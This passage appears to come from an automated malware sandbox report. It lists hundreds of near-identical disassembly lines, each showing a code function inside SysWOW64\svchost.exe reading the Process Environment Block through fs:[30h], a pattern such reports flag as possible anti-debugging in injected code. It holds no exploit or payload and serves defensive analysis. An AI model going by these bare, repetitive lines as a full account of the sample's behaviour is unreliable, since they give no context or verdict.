          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]1_2_03AFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD8350 mov ecx, dword ptr fs:[00000030h]1_2_03AD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0634F mov eax, dword ptr fs:[00000030h]1_2_03B0634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B062D6 mov eax, dword ptr fs:[00000030h]1_2_03B062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]1_2_03A2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]1_2_03A2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov eax, dword ptr fs:[00000030h]1_2_03AB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov ecx, dword ptr fs:[00000030h]1_2_03AB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0625D mov eax, dword ptr fs:[00000030h]1_2_03B0625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]1_2_03A2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]1_2_03A36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]1_2_03A70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]1_2_03B061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]1_2_03A601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]1_2_03A60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]1_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]1_2_03AF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]1_2_03B04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]1_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]1_2_03A2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC8158 mov eax, dword ptr fs:[00000030h]1_2_03AC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A280A0 mov eax, dword ptr fs:[00000030h]1_2_03A280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC80A8 mov eax, dword ptr fs:[00000030h]1_2_03AC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]1_2_03AF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03AF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]1_2_03A3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03A2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]1_2_03A380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB60E0 mov eax, dword ptr fs:[00000030h]1_2_03AB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03A2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]1_2_03A720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]1_2_03AB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]1_2_03A2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]1_2_03A2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC6030 mov eax, dword ptr fs:[00000030h]1_2_03AC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]1_2_03AB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]1_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]1_2_03A5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]1_2_03A32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB6050 mov eax, dword ptr fs:[00000030h]1_2_03AB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]1_2_03A307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE47A0 mov eax, dword ptr fs:[00000030h]1_2_03AE47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD678E mov eax, dword ptr fs:[00000030h]1_2_03AD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]1_2_03ABE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03A3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]1_2_03AB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]1_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]1_2_03AAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]1_2_03A6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]1_2_03A30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]1_2_03A60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]1_2_03A38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]1_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]1_2_03A30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABE75D mov eax, dword ptr fs:[00000030h]1_2_03ABE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]1_2_03AB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03A6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]1_2_03A666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03A6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03A6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]1_2_03A4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]1_2_03A66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]1_2_03A68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]1_2_03A3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]1_2_03AAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72619 mov eax, dword ptr fs:[00000030h]1_2_03A72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]1_2_03AF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]1_2_03A6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A62674 mov eax, dword ptr fs:[00000030h]1_2_03A62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4C640 mov eax, dword ptr fs:[00000030h]1_2_03A4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]1_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]1_2_03A545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov eax, dword ptr fs:[00000030h]1_2_03A32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32582 mov ecx, dword ptr fs:[00000030h]1_2_03A32582
